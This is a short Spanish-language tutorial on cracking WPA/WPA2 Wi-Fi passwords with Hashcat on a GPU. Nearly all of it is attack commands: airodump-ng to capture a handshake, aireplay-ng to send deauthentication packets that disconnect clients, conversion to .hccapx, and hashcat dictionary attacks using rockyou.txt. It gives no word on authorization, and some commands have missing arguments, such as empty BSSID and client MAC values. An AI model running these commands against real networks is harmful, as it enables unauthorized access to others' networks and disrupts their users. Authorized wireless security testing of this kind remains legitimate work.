Cracking WPA/WPA2 con Hashcat
Este método utiliza la potencia de una tarjeta gráfica (GPU) para descifrar contraseñas WPA2 de manera más eficiente que los métodos tradicionales basados en CPU. Para ello, se emplea la herramienta Hashcat, que permite aprovechar la capacidad de cálculo de la GPU para agilizar el proceso.
Pasos del proceso
Capturar paquete
airodump-ng --channel 6 --bssid -w <archivo_salida> wlan0
Enviar paquetes de desautenticacion
aireplay-ng --deauth 10 -a -c wlan0mon
Conversión del archivo Handshake
Convierte el archivo .cap
al formato .hccapx
necesario para Hashcat. Usa hcxpcapngtool
o una herramienta similar.
hcxpcapngtool -o archivo_convertido.hccapx archivo_original.cap
Preparar el ataque
Cargar el archivo handshake: Añade el archivo
.hccapx
previamente convertido.Seleccionar tipo de cifrado: WPA2 corresponde al hash tipo
2500
.Añadir wordlist: Utiliza una lista de posibles contraseñas, como
rockyou.txt
.
Descifrar la clave
hashcat -m 2500 -a 0 archivo_convertido.hccapx rockyou.txt --force
Ejecutar Hashcat con GPU
Para asegurarte de usar la GPU, verifica y selecciona los dispositivos disponibles.
Comandos para listar dispositivos
hashcat -I
Descifrar la clave
hashcat -m 2500 -a 0 archivo_convertido.hccapx wordlist.txt --opencl-device-types 1
--opencl-device-types 1
: Utiliza exclusivamente la GPU.
Última actualización